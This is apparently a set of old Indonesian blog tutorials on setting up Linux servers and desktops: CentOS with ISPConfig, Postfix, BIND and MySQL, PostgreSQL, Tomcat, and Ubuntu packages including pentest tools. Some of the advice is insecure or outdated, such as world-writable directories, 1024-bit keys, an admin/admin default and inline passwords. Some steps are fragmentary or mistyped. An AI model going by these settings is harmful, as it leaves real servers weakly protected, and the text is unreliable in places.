- OS : OS Centos 5.4 (disini tidak dibahas mengenai instalasi OS. Instalasi OS yg dibutuhkan standard package no GUI)
- Web Server: Apache/2.2.3 with PHP 5.1.6
- Web statistik : Webalizer V2.01-10
- Database Server: MySQL 5.0.77
- Mail Server: Postfix
- DNS Server: BIND9 (chrooted)
- FTP Server: Proftpd v1.3.2c
- POP3/IMAP server: Dovecot 1.0.7

# lspci | grep Ethernet

# tar zxvf l2-linux-v1.0.40.4.tar.gz
# cd l2-linux-v1.0.40.4/src
# make && make install

# vi /etc/hosts

# vi /etc/resolv.conf

# vi /etc/sysconfig/network

# vi /etc/sysconfig/network-scripts/ifcfg-eth0

# /etc/init.d/network restart

# ifconfig

Instalasi paket yang dibutuhkan :
Remove paket yang tidak diinginkan (opsional) :

# yum remove vsftpd NetworkManager irda isdn pcscd

Setting repository ke lokal repo kambing.ui.ac.id (opsional bergantung repo yang biasa anda pakai) :
# mv /etc/yum.repos.d/CentOS-Base.repo /etc/yum.repos.d/CentOS-Base.repo.asli
# vim /etc/yum.repos.d/kambing.repo

# Repository dari server kambing.ui.ac.id
[kambing-base]
name=CentOS.kambing-$releasever – Base
baseurl=http://kambing.ui.ac.id/centos/$releasever/os/$basearch/
gpgkey=http://kambing.ui.ac.id/centos/RPM-GPG-KEY-CentOS-5

[kambing-updates]
name=CentOS.kambing-$releasever – Updates
baseurl=http://kambing.ui.ac.id/centos/$releasever/updates/$basearch/
gpgkey=http://kambing.ui.ac.id/centos/RPM-GPG-KEY-CentOS-5

[kambing-addons]
name=CentOS.kambing-$releasever – Addons
baseurl=http://kambing.ui.ac.id/centos/$releasever/addons/$basearch/
gpgkey=http://kambing.ui.ac.id/centos/RPM-GPG-KEY-CentOS-5

[kambing-extras]
name=CentOS.kambing-$releasever – Extras
baseurl=http://kambing.ui.ac.id/centos/$releasever/extras/$basearch/
gpgkey=http://kambing.ui.ac.id/centos/RPM-GPG-KEY-CentOS-5

[kambing-centosplus]
name=CentOS.kambing-$releasever – Centosplus
baseurl=http://kambing.ui.ac.id/centos/$releasever/centosplus/$basearch/
enable=1
gpgkey=http://kambing.ui.ac.id/centos/RPM-GPG-KEY-CentOS-5

[kambing-contrib]
name=CentOS.kambing-$releasever – Contrib
baseurl=http://kambing.ui.ac.id/centos/$releasever/contrib/$basearch/
enable=1
gpgkey=http://kambing.ui.ac.id/centos/RPM-GPG-KEY-CentOS-5

[kambing-fasttrack]
name=CentOS.kambing-$releasever – Fasttrack
baseurl=http://kambing.ui.ac.id/centos/$releasever/fasttrack/$basearch/
enable=1
gpgkey=http://kambing.ui.ac.id/centos/RPM-GPG-KEY-CentOS-5

import GPG key untuk authentikasi :
# rpm –import http://kambing.ui.ac.id/centos/RPM-GPG-KEY-CentOS-5
# yum clean all
# yum makecache
# yum update
# reboot
# uname -a

Linux jempol 2.6.18-164.11.1.el5.centos.plusxen #1 SMP Wed Jan 20 20:14:28 EST 2010 i686 i686 i386 GNU/Linux

Install paket yang diperlukan :

# yum install fetchmail wget bzip2 unzip zip nmap openssl lynx fileutils gcc \
gcc-c++ quota bind bind-chroot mysql mysql-devel mysql-server cyrus-sasl cyrus-sasl-devel \
cyrus-sasl-gssapi cyrus-sasl-md5 cyrus-sasl-plain postfix dovecot php php-devel php-gd php-imap \
php-ldap php-mysql php-odbc php-pear php-xml php-xmlrpc curl curl-devel perl-libwww-perl ImageMagick \
libxml2 libxml2-devel httpd-devel ruby ruby-devel mod_python perl-HTML-Parser perl-DBI perl-Net-DNS \
perl-Digest-SHA1 webalizer ntp

Setting quota :
tambahkan usrquota,grpquota dibelakang defaults pada root :
# vi /etc/fstab
/dev/VolGroup00/LogVol00 / ext3 defaults,usrquota,grpquota 1 1
LABEL=/boot /boot ext3 defaults 1 2
tmpfs /dev/shm tmpfs defaults 0 0
devpts /dev/pts devpts gid=5,mode=620 0 0
sysfs /sys sysfs defaults 0 0
proc /proc proc defaults 0 0
/dev/VolGroup00/LogVol01 swap swap defaults 0 0

# touch /aquota.user /aquota.group
# chmod 600 /aquota.*
# mount -o remount /
# quotacheck -avugm
# quotaon -avug

Setting Chrooted DNS Server (BIND9) :
# chmod 755 /var/named/
# chmod 775 /var/named/chroot/
# chmod 775 /var/named/chroot/var/
# chmod 775 /var/named/chroot/var/named/
# chmod 775 /var/named/chroot/var/run/
# chmod 777 /var/named/chroot/var/run/named/
# cd /var/named/chroot/var/named/
# ln -s ../../ chroot
# cp /usr/share/doc/bind-9.3.6/sample/var/named/named.local /var/named/chroot/var/named/named.local
# cp /usr/share/doc/bind-9.3.6/sample/var/named/named.root /var/named/chroot/var/named/named.root
# touch /var/named/chroot/etc/named.conf
# chkconfig –levels 235 named on
# /etc/init.d/named start

Setting MySQL Server :
# vi /etc/my.cnf
Hapus tanda # pada bagian skip-networking
# chkconfig –levels 235 mysqld on
# /etc/init.d/mysqld start
# mysqladmin -u root password rootpasswordmysql
# mysqladmin -h jempol.wedus.us -u root password rootpasswordmysql

Setting SMTP-AUTH dan TLS pada Postfix :
# postconf -e ’smtpd_sasl_local_domain =’
# postconf -e ’smtpd_sasl_auth_enable = yes’
# postconf -e ’smtpd_sasl_security_options = noanonymous’
# postconf -e ‘broken_sasl_auth_clients = yes’
# postconf -e ’smtpd_sasl_authenticated_header = yes’
# postconf -e ’smtpd_recipient_restrictions = permit_sasl_authenticated,permit_mynetworks,reject_unauth_destination’
# postconf -e ‘inet_interfaces = all’
# postconf -e ‘mynetworks = 127.0.0.0/8′
Aktifkan PLAIN dan LOGIN untuk login dengan melakukan editing file :
# vi /usr/lib/sasl2/smtpd.conf

pwcheck_method: saslauthd
mech_list: plain login

Notes : untuk CentOS 64 bit letak file smtpd.conf di /usr/lib64/sasl2/smtpd.conf

Certificate untuk TLS :

# mkdir /etc/postfix/ssl
# cd /etc/postfix/ssl/
# openssl genrsa -des3 -rand /etc/hosts -out smtpd.key 1024

# chmod 600 smtpd.key
# openssl req -new -key smtpd.key -out smtpd.csr

# openssl x509 -req -days 3650 -in smtpd.csr -signkey smtpd.key -out smtpd.crt

# openssl rsa -in smtpd.key -out smtpd.key.unencrypted

# mv -f smtpd.key.unencrypted smtpd.key
# openssl req -new -x509 -extensions v3_ca -keyout cakey.pem -out cacert.pem -days 3650

Configure Postfix for TLS:

# postconf -e ’smtpd_tls_auth_only = no’
# postconf -e ’smtp_use_tls = yes’
# postconf -e ’smtpd_use_tls = yes’
# postconf -e ’smtp_tls_note_starttls_offer = yes’
# postconf -e ’smtpd_tls_key_file = /etc/postfix/ssl/smtpd.key’
# postconf -e ’smtpd_tls_cert_file = /etc/postfix/ssl/smtpd.crt’
# postconf -e ’smtpd_tls_CAfile = /etc/postfix/ssl/cacert.pem’
# postconf -e ’smtpd_tls_loglevel = 1′
# postconf -e ’smtpd_tls_received_header = yes’
# postconf -e ’smtpd_tls_session_cache_timeout = 3600s’
# postconf -e ‘tls_random_source = dev:/dev/urandom’

Set hostname untuk Postfix :
postconf -e ‘myhostname = jempol.wedus.us’
Konfigurasi Postfix selesai, silahkan cek hasil konfigurasinya :
# cat /etc/postfix/main.cf (comments sudah dihilangkan)

queue_directory = /var/spool/postfix
command_directory = /usr/sbin
daemon_directory = /usr/libexec/postfix
mail_owner = postfix
inet_interfaces = all
mydestination = $myhostname, localhost.$mydomain, localhost
unknown_local_recipient_reject_code = 550
alias_maps = hash:/etc/aliases
alias_database = hash:/etc/aliases
debug_peer_level = 2
debugger_command =
PATH=/bin:/usr/bin:/usr/local/bin:/usr/X11R6/bin
xxgdb $daemon_directory/$process_name $process_id & sleep 5

sendmail_path = /usr/sbin/sendmail.postfix
newaliases_path = /usr/bin/newaliases.postfix
mailq_path = /usr/bin/mailq.postfix
setgid_group = postdrop
html_directory = no
manpage_directory = /usr/share/man
sample_directory = /usr/share/doc/postfix-2.3.3/samples
readme_directory = /usr/share/doc/postfix-2.3.3/README_FILES
smtpd_sasl_local_domain =
smtpd_sasl_auth_enable = yes
smtpd_sasl_security_options = noanonymous
broken_sasl_auth_clients = yes
smtpd_sasl_authenticated_header = yes
smtpd_recipient_restrictions = permit_sasl_authenticated,permit_mynetworks,reject_unauth_destination
mynetworks = 127.0.0.0/8
smtpd_tls_auth_only = no
smtp_use_tls = yes
smtpd_use_tls = yes
smtp_tls_note_starttls_offer = yes
smtpd_tls_key_file = /etc/postfix/ssl/smtpd.key
smtpd_tls_cert_file = /etc/postfix/ssl/smtpd.crt
smtpd_tls_CAfile = /etc/postfix/ssl/cacert.pem
smtpd_tls_loglevel = 1
smtpd_tls_received_header = yes
smtpd_tls_session_cache_timeout = 3600s
tls_random_source = dev:/dev/urandom
myhostname = jempol.wedus.us

Aktivasi protokol imap, imaps, pop3, dan pop3s pada Dovecot :
# vi /etc/dovecot.conf

# Protocols we want to be serving: imap imaps pop3 pop3s
# If you only want to use dovecot-auth, you can set this to “none”.
protocols = imap imaps pop3 pop3s

Start on boot Postfix, saslauthd, Dovecot dan disable sendmail :

# chkconfig –levels 235 sendmail off
# chkconfig –levels 235 postfix on
# chkconfig –levels 235 saslauthd on
# chkconfig –levels 235 dovecot on
# /etc/init.d/sendmail stop
# /etc/init.d/postfix start
# /etc/init.d/saslauthd start
# /etc/init.d/dovecot start

##############
To see if SMTP-AUTH and TLS work properly now run the following command:

telnet localhost 25

After you have established the connection to your Postfix mail server type

ehlo localhost

If you see the lines

250-STARTTLS

and

250-AUTH LOGIN PLAIN

everything is fine.

[root@server1 ssl]# telnet localhost 25
Trying 127.0.0.1…
Connected to localhost.localdomain (127.0.0.1).
Escape character is ‘^]’.
220 server1.example.com ESMTP Postfix
ehlo localhost
250-server1.example.com
250-PIPELINING
250-SIZE 10240000
250-VRFY
250-ETRN
250-STARTTLS
250-AUTH LOGIN PLAIN
250-AUTH=LOGIN PLAIN
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
quit
221 2.0.0 Bye
Connection closed by foreign host.
[root@server1 ssl]#

Type

quit

Setting Maildir Dovecot
Format Dovecot tidak menggunakan mbox tetapi menggunakan Maildir, aktifkan Maildir ini dari menu ISPConfig di Management -> Server -> Settings -> Email.

postconf -e ‘home_mailbox = Maildir/’
postconf -e ‘mailbox_command =’
/etc/init.d/postfix restart

Setting Apache Webserver :
# vi /etc/httpd/conf/httpd.conf

DirectoryIndex index.html index.htm index.shtml index.cgi index.php index.php3 index.pl

Instalasi ISPCpnfig :
Download ISPConfig2 terlebih dahulu di sini
# tar zxvf ISPConfig.tar.gz
# cd ISPConfig
# ./setup

CentOS 5.4
Neuinstallation eines ISPConfig-Systems. / Installation of a new ISPConfig system. / Installation d’ISPConfig sur un nouveau syst�me.
W�hlen Sie Ihre Sprache (deutsch/englisch/spanisch/franz�sisch/italienisch/niederl�ndisch/polnisch/schwedisch): / Please choose your language (German/English/Spanish/French/Italian/Dutch/Polish/Swedish): / Merci de choisir votre langue (Allemand/Anglais/Espagnol/Fran�ais/Italien/N�erlandais/Polonais/Su�dois):
1) de
2) en
3) es
4) fr
5) it
6) nl
7) pl
se
Ihre Wahl: / Your Choice: / Votre Choix:2
With the system installation, some system files are replaced where adjustments were made. This can lead to loss of entries in httpd.conf, named.conf as well as in the Sendmail configuration.

Do you want to continue with the installation? [y/n]y
Please read through the licence carefully:

Copyright (c) 2005, projektfarm GmbH, Till Brehm, Falko Timme
All rights reserved.

Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:

* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of ISPConfig nor the names of its contributors
may be used to endorse or promote products derived from this software without
specific prior written permission.

THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS “AS IS” AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

Do you accept the licence? [y/n]y

Please select the installation mode. In expert mode you have to answer some additional questions. In standard mode standard values are assumed for these questions.
1) standard
2) expert
Your Choice: 1

########## MAIL SERVER ##########

Checking for MTA…
/usr/sbin/postfix
OK

ISPConfig found the following MTA:
postfix
Is this correct? [y/n]y

########## FTP SERVER ##########

Checking if an FTP server is installed…
/usr/sbin/proftpd
OK

ISPConfig found the following FTP server:
proftpd
Is this correct? [y/n]y

########## PROCMAIL ##########

Checking for package procmail…
/usr/bin/procmail
OK

########## QUOTA ##########

Checking for package quota…
/usr/bin/quota
OK

########## MYSQL SERVER ##########

Checking for package MySQL…
/usr/bin/mysql
OK

########## OPENSSL ##########

Checking for package openssl…
/usr/bin/openssl
OK

########## DNS SERVER ##########

Checking for package bind…
/usr/sbin/named
OK

########## IPTABLES/IPCHAINS/IPFW ##########

Checking for program iptables/ipchains/ipfw…
/sbin/iptables
OK

########## WEB SERVER ##########

Checking for program httpd…
/usr/sbin/httpd
OK
Checking the syntax of the httpd.conf…
Syntax OK
The syntax is ok!

########## gcc ##########

/usr/bin/gcc
OK

########## make ##########

/usr/bin/make
OK

########## lex ##########

/usr/bin/lex
OK

########## g++ ##########

/usr/bin/g++
OK

########## INSTALLATION ##########

proses instalasi……….
————
Generating custom certificate signed by own CA [CUSTOM]
______________________________________________________________________

STEP 0: Decide the signature algorithm used for certificates
The generated X.509 certificates can contain either
RSA or DSA based ingredients. Select the one you want to use.
Signature Algorithm ((R)SA or (D)SA) [R]:R
______________________________________________________________________

STEP 1: Generating RSA private key for CA (1024 bit) [ca.key]
178805 semi-random bytes loaded
Generating RSA private key, 1024 bit long modulus
………………….++++++
………………….++++++
e is 65537 (0×10001)
______________________________________________________________________

STEP 2: Generating X.509 certificate signing request for CA [ca.csr]
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter ‘.’, the field will be left blank.
—–
1. Country Name (2 letter code) [XY]:ID
2. State or Province Name (full name) [Snake Desert]:East Java
3. Locality Name (eg, city) [Snake Town]:Malang
4. Organization Name (eg, company) [Snake Oil, Ltd]:PT. Wedus Gembel
5. Organizational Unit Name (eg, section) [Certificate Authority]:Wedus Team
6. Common Name (eg, CA name) [Snake Oil CA]:Wedus CA
7. Email Address (eg, name@FQDN) [ca@snakeoil.dom]:ca@wedus.us
8. Certificate Validity (days) [365]:365
______________________________________________________________________

STEP 3: Generating X.509 certificate for CA signed by itself [ca.crt]
Certificate Version (1 or 3) [3]:3
Signature ok
subject=/C=ID/ST=East Java/L=Malang/O=PT. Wedus Gembel/OU=Wedus Team/CN=Wedus CA/emailAddress=ca@wedus.us
Getting Private key
Verify: matching certificate & key modulus
Verify: matching certificate signature
../conf/ssl.crt/ca.crt: /C=ID/ST=East Java/L=Malang/O=PT. Wedus Gembel/OU=Wedus Team/CN=Wedus CA/emailAddress=ca@wedus.us
error 18 at 0 depth lookup:self signed certificate
OK
______________________________________________________________________

STEP 4: Generating RSA private key for SERVER (1024 bit) [server.key]
178947 semi-random bytes loaded
Generating RSA private key, 1024 bit long modulus
………++++++
……………++++++
e is 65537 (0×10001)
______________________________________________________________________

STEP 5: Generating X.509 certificate signing request for SERVER [server.csr]
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter ‘.’, the field will be left blank.
—–
1. Country Name (2 letter code) [XY]:ID
2. State or Province Name (full name) [Snake Desert]:East Java
3. Locality Name (eg, city) [Snake Town]:Malang
4. Organization Name (eg, company) [Snake Oil, Ltd]:PT. Wedus Gembel
5. Organizational Unit Name (eg, section) [Webserver Team]:Wedus Team
6. Common Name (eg, FQDN) [www.snakeoil.dom]:www.wedus.us
7. Email Address (eg, name@fqdn) [www@snakeoil.dom]:info@wedus.us
8. Certificate Validity (days) [365]:365
______________________________________________________________________

STEP 6: Generating X.509 certificate signed by own CA [server.crt]
Certificate Version (1 or 3) [3]:3
Signature ok
subject=/C=ID/ST=East Java/L=Malang/O=PT. Wedus Gembel/OU=Wedus Team/CN=www.wedus.us/emailAddress=info@wedus.us
Getting CA Private Key
Verify: matching certificate & key modulus
Verify: matching certificate signature
../conf/ssl.crt/server.crt: OK
______________________________________________________________________

STEP 7: Enrypting RSA private key of CA with a pass phrase for security [ca.key]
The contents of the ca.key file (the generated private key) has to be
kept secret. So we strongly recommend you to encrypt the server.key file
with a Triple-DES cipher and a Pass Phrase.
Encrypt the private key now? [Y/n]: y
writing RSA key
Enter PEM pass phrase:
Verifying – Enter PEM pass phrase:
Fine, you’re using an encrypted private key.
_______________________________________________________________________

STEP 8: Enrypting RSA private key of SERVER with a pass phrase for security [server.key]
The contents of the server.key file (the generated private key) has to be
kept secret. So we strongly recommend you to encrypt the server.key file
with a Triple-DES cipher and a Pass Phrase.
Encrypt the private key now? [Y/n]: y
writing RSA key
Enter PEM pass phrase:
Verifying – Enter PEM pass phrase:

————
Connected successfully to MySQL server
no crontab for root
Restarting some services…
Shutting down postfix: [ OK ]
Starting postfix: [ OK ]
Shutting down proftpd: [ OK ]
Starting proftpd: [ OK ]
Starting ISPConfig system…
Apache/1.3.41 mod_ssl/2.8.31 (Pass Phrase Dialog)
Some of your private key files are encrypted for security reasons.
In order to read them you have to provide us with the pass phrases.

Server jempol.wedus.us:81 (RSA)
Enter pass phrase:

Ok: Pass Phrase Dialog successful.
/root/ispconfig/httpd/bin/apachectl startssl: httpd started
ISPConfig system is now up and running!
Congratulations! Your ISPConfig system is now installed. If you had to install quota, please take the steps described in the installation manual. Otherwise your system is now available without reboot.
Please direct your browser to

https://jempol.wedus.us:81

and log in:
Username: admin
Password: admin

[root@jempol install_ispconfig]#

Reference : http://www.howtoforge.org

Untuk menginstall Database PostgreSQL di Ubuntu OS tidaklah sulit, apalagi ubuntu udah menyediakan package-packagenya. Mungkin yang perlu diperhatikan hanyalah langkah-langkahnya, berikut adalah langkah-langkah menginstall Databas PostgreSQL:

Langkah pertama adalah menginstall PostgreSQL Server disini saya menggunakan PostgreSQL Server 8.4, untuk mendapatkan packagenya bisa menggunakan Synaptic Package Manager

→ Quick Search with key “postgresql”

maka akan muncul nama-nama package yang tersedia di ubuntu

→ postgresql-server-dev-8.4

pilih mark for installation lalu Applay maka secara otomatis proses installasi akan berjalan dengan sendirinya.

Langkah berikutnya adalah install PostgreSQL Client, PostgreSQL Contrib & Install PgAdmin3, pada intalasi berikut bisa dilakukan melalui Synaptic atau langsung melalui command seperti berikut:

→ $ sudo apt-get install postgresql postgresql-client postgresql-contrib

→ $ sudo apt-get install pgadmin3

ket: Baris pertama untuk menginstall paket postgresql dan paket-paket yang lain yang dibutuhkan, sedangkan dibaris berikutnya menginstall pgadmin yaitu Graphical User Interface untuk PostgreSQL Admin.

Setelah proses instalasi berhasil, yang perlu diperhatikan adalah melakukan reset password postgres (account administrator). Ketik perintah berikut dalam command:

→ $ sudo su postgres -c psql

→ postgres=# ALTER USER postgres WITH PASSWORD ‘passwordku’;

→ postgres=# \q

perintah tersebut akan merubah password postgres menjadi passwordku, dan sekarang waktunya menyamakan password unix untuk user postgres.

→ $ sudo passwd -d postgres

→ $ sudo su postgres -c passwd

masukkan password yang sama dengan tadi, dalam hal ini passwordku(minimal 6 Digit). Setelah itu agar pgAdmin bisa masuk ke database server menggunakan user postgres, kita harus men set-up PostgreSQL admin pack. caranya jalankan perintah berikut dalam command line

→$ sudo su postgres -c psql < /usr/share/postgresql/8.4/contrib/adminpack.sql

Kemudia atur konfigurasi postgresql.conf

→ $ sudo gedit /etc/postgresql/8.4/main/postgresql.conf

ganti baris berikut:

#listen_addresses = ‘localhost’

menjadi

listen_addresses = ‘*’

dan juga baris :

#password_encryption = on

menjadi

password_encryption = on

Simpan dan tutup gedit.

Langkah terakhir adalah menentukan siapa saja yang berhak masuk ke dalam server dengan mengedit file pg_hba.con

$ sudo gedit /etc/postgresql/8.4/main/pg_hba.conf

pastikan isi file seperti berikut

# DO NOT DISABLE!

# If you change this first entry you will need to make sure that the

# database

# super user can access the database using some other method.

# Noninteractive

# access to all databases is required during automatic maintenance

# (autovacuum, daily cronjob, replication, and similar tasks).

#

# Database administrative login by UNIX sockets

local all postgres ident sameuser

# TYPE DATABASE USER CIDR-ADDRESS METHOD

# “local” is for Unix domain socket connections only

local all all md5

# IPv4 local connections:

host all all 127.0.0.1/32 md5

# IPv6 local connections:

host all all ::1/128 md5

# Connections for all PCs on the subnet

#

# TYPE DATABASE USER IP-ADDRESS IP-MASK METHOD

host all all [ip address] [subnet mask] md5

Ganti [ip address] denga alamat ip dari komputer yang diperbolehkan masuk ke dalam server database, seperti 192.168.1.5 dan [subnet mask] dengan subnet jaringan kita. Jika ingin yang terkoneksi dari semua ip yang ada dalam subnet, anda bisa memberi ip address dengan subnet address seperti 192.168.1.0 maka semua ip 192.168.1.x

dan langkah yang terakhir adalah merestart Server PostgreSQL dengan perintah:

→ $ sudo /etc/init.d/postgresql-8.4 restart

Selesai sudah, Semoga bermanfaat.

 $ sudo aptitude install sudo aptitude install ubuntu-restricted-extras build-essential gwget xchat python-glade2 usb-imagewriter pidgin mozilla-thunderbird filezilla wine youtube-dl httrack webhttrack xchm

2. Software Packager

 $ sudo aptitude install unace rar unrar zip unzip p7zip-full p7zip-rar sharutils aish uudeview mpack lha arj cabextract file-roller

3. More fonts

 $ sudo aptitude install msttcorefonts ttf-larabie-straight ttf-larabie-deco xfonts-terminus-dos xfonts-terminus xfonts-terminus-oblique xfonts-mona ttf-farsiweb ttf-opensymbol ttf-freefont ttf-dustin ttf-devanagari-fonts ttf-dejavu-extra ttf-dejavu-core ttf-dejavu ttf-bpg-georgian-fonts ttf-alee

4. Multimedia

 $ sudo aptitude install vlc audacious mpeg2dec a52dec mpg321 mpg123 libswfdec0.3 libflac++6 ffmpeg cdda2wav libmp4v2-0 libmjpegtools0c2a tagtool easytag id3tool lame lame-extras nautilus-script-audio-convert libmad0 libjpeg-progs libmpcdec3 libquicktime1 flac faac faad sox toolame a52dec ffmpeg2theora libmpeg2-4 uudeview flac libmpeg3-1 mpeg3-utils mpegdemux imagemagick

Tips pake image magick sekali tebang bisa edit banyak foto :
resize by lebar photo :

 $ for k in $(ls *.JPG); do convert $k -resize 1024 -quality 90 $k; done

kalo resize by tinggi photo :

 $ for k in $(ls *.JPG); do convert $k -resize x768 -quality 90 $k; done

dah… tips ini berguna waktu edit foto2 lawas yang udah bergiga2 di HD Ext, so sekali jalan.. wuss…. bisa hemat space smp 2gb. Mayan tooohh….

5. Flash

 $ sudo aptitude install gsfonts gsfonts-x11 flashplugin-nonfree

6. Java

 $ sudo aptitude install sun-java6-bin sun-java6-fonts sun-java6-jdk sun-java6-plugin

 $ sudo update-alternatives --config java

7. IDE for Java and Python

 $ sudo aptitude install netbeans eclipse spe vim

8. Virtual Box
Apabila ingin menambah package virtual box, tambahkan repository di /etc/apt/source.list (kebetulan saya menggunakan ubuntu karmic koala, apabila anda menggunakan versi lain silahkan disesuaikan) :

# Virtual Box
deb http://www.virtualbox.org/debian karmic non-free

Kemudian masukkan public key dari domain tersebut :

 $ wget -q http://download.virtualbox.org/virtualbox/debian/sun_vbox.asc -O- | sudo apt-key add -

Update source list :

 $ sudo aptitude update

Install Virtual Box :

 $ sudo aptitude install virtualbox-3.0 dkms bridge-utils

Note : setting virtual network vbox di ubuntu supaya bisa konek ke network lokal maupun internet disarankan menggunakan adapter type : Intel PRO 1000 MT (Desktop) dan attached to : NAT

9. Google Chrome / Chromium – web browser
Tambahkan list repository di /etc/apt/source.list dengan :

deb http://ppa.launchpad.net/chromium-daily/ppa/ubuntu karmic main
deb-src http://ppa.launchpad.net/chromium-daily/ppa/ubuntu karmic main

Tambahkan GPG key :

 $ sudo apt-key adv --recv-keys --keyserver keyserver.ubuntu.com 0xfbef0d696de1c72ba5a835fe5a9bf3bb4e5e17b5

Update source list :

 $ sudo aptitude update

Install google chrome :

 $ sudo aptitude install chromium-browser

10. Open Project – Project Management Tools
Download open project dari sourceforge di :

 http://sourceforge.net/projects/openproj/files/OpenProj%20Binaries/1.4/openproj_1.4-2.deb/download

Abis itu?? ya langsung double click aja… nda usah pake console2an
11. Penetration testing, incident response, and computer forensics

 $ sudo aptitude install kismet aircrack-ng wireshark nmap dsniff autopsy nikto ophcrack aterm nessusd nessus nessus-plugins

Package aterm (xterm emulator) dibuat supaya aplikasi-aplikasi berbasis cli (command line interface) dapat dibuat executable dari pulldown menu ubuntu.
Buat satu file /usr/bin/spy-term :

 $ sudo vim /usr/bin/spy-term

Masukkan baris berikut :

#!/bin/sh
/usr/bin/aterm -tint yellow -tr -trsb -sh 10 -cr green +sb -sl 1000 -title "Autopsy Shell" -fg White -e /usr/bin/autopsy

Setelah filenya disimpan, buat file tersebut executable :

 $ sudo chmod +x /usr/bin/psy-term

Buat satu menu tersendiri dari menu System -> Preferences -> Main Menu, dan buatlah shortcut menu dengan memilih Application dan memanggil /usr/bin/psy-term. Selamat mencoba dan berkreasi…
Apabila ingin menambah dengan metasploit, silahkan dilihat disini
Untuk instalasi Apache web server beserta databasenya (MySQL) juga sudah pernah saya tulis, silahkan dilihat disini
Ada yang ingin menambahkan??

Update 19 Februari 2010 :
Beberapa waktu yang lalu ada pertanyaan dari teman, gimana supaya linux (baca: ubuntu) bisa disandingkan dengan media center-nya microsoft. It’s easy step i guess :

  $ sudo add-apt-repository ppa:team-xbmc
  $ sudo apt-get update
  $ sudo apt-get install xbmc xbmc-standalone
  $ sudo apt-get update

Apabila muncul error “E: Broken package” pada saat instalasi, aktifkan menu “Community-maintained open Source software (universe)” dan “Software restricted by copyright or legal issues (multiverse)” dari menu System –> Administration –> Software Sources.
Nah silahkan direview hasilnya karena saya sendiri belum kelar coba-coba xbmc tersebut.. cayoo

b. Sun Java (JDK)
- Install paket instalasi java JDK:
$ sudo aptitude install sun-java6-jdk
- Set Sun Java JDK sebagai default JDK:
$ sudo update-java-alternatives -s java-6-sun
- Buat variable JAVA_HOME:
$ sudo echo ‘JAVA_HOME=”/usr/lib/jvm/java-6-sun”‘ | sudo tee -a /etc/environment
- Supaya variabel ini bisa langsung digunakan tulis :
$ source /etc/environment

c. Apache-tomcat
- Install paket apache tomcat :
$ sudo aptitude install tomcat6 tomcat6-admin
- Cek port running tomcat. Apabila apache webserver sudah terinstall di port 80, biasanya tomcat akan running di port 8080, untuk memastikan dari firefox, buka http://localhost:8080 atau menggunakan tools nmap :
$ sudo nmap -v -sS -A localhost
- Set variabel CATALINA_HOME dan CATALINA_BASE :
$ sudo echo ‘CATALINA_HOME=”/usr/share/tomcat6″‘ | sudo tee -a /etc/environment
$ sudo echo ‘CATALINA_BASE=”/var/lib/tomcat6″‘ | sudo tee -a /etc/environment
- Edit file /etc/default/tomcat6, dan tambahkan baris dibawah :
JAVA_OPTS=”-Djava.awt.headless=true -Xms384M -Xmx512M -XX:MaxPermSize=256M”
- Kopi tools.jar dari java class path :
$ sudo cp $JAVA_HOME/lib/tools.jar /var/lib/tomcat6/lib/
- Buat user manager dan account manager tomcat di /etc/tomcat6/tomcat-users.xml :

d. Apache Ant
- Install Apache Ant :
$ sudo aptitude install ant ant-optional
- Set home variable apache ant :
$ sudo echo ‘ANT_HOME=”/usr/share/ant”‘ | sudo tee -a /etc/environment
- Set variable ant_opts (32bit):
$ sudo echo ‘ANT_OPTS=”-Xmx1024M”‘ | sudo tee -a /etc/environment
- Apabila menggunakan 64bits bisa menggunakan perintah ini :
$ sudo echo ‘ANT_OPTS=”-Xmx1024M -XX:MaxPermSize=128M”‘ | sudo tee -a /etc/environment
—- Sebenarnya dah selesai tinggal install openbravo-nya, tapi lagi males banget untuk nulis.. hehehe…
ntar aja update lagi deh…..

id:3:initdefault:

Kemudian pindahkan atau rename file /etc/rc3.d/S*0gdm. Kemudian restart….
Root access di ubuntu by default dilock, untuk aktifinnya (hanya apabila diperlukan saja) :

$ sudo bash

atau :

$ sudo su

kemudian ganti password dengan password yang diinginkan :

# passwd root

Root udah aktif..
Dan untuk menonaktifkan lagi root access apabila tidak diperlukan :

$ sudo passwd -l root

Permission file

user		group	world
r+w+x	  r+x	  r+x
4+2+1	4+0+1	4+0+1  = 755

$ update-manager -d

Sampai muncul gambar seperti dibawah ini :

Nah tuh kan.. muncul New distribution release ‘9.04′ is avaliable. Tekan Upgrade dan ikuti wizard instalasinya sampai selesai.
Cara yang lain dengan melakukan editing file sources.list di /etc/apt. Dengan menggunakan editor, ganti kata “intrepid” dengan “jaunty”, kemudian simpan, dan jalankan perintah berikut :

$ sudo aptitude update && sudo aptitude full-upgrade && sudo aptitude purge

Tinggal nunggu proses selesai aja.
Kalo instalasi udah selesai, bisa kita liat release ubuntu kita yang baru :

$ sudo lsb_release -a

Distributor ID:	Ubuntu
Description:	Ubuntu 9.04
Release:	9.04
Codename:	jaunty

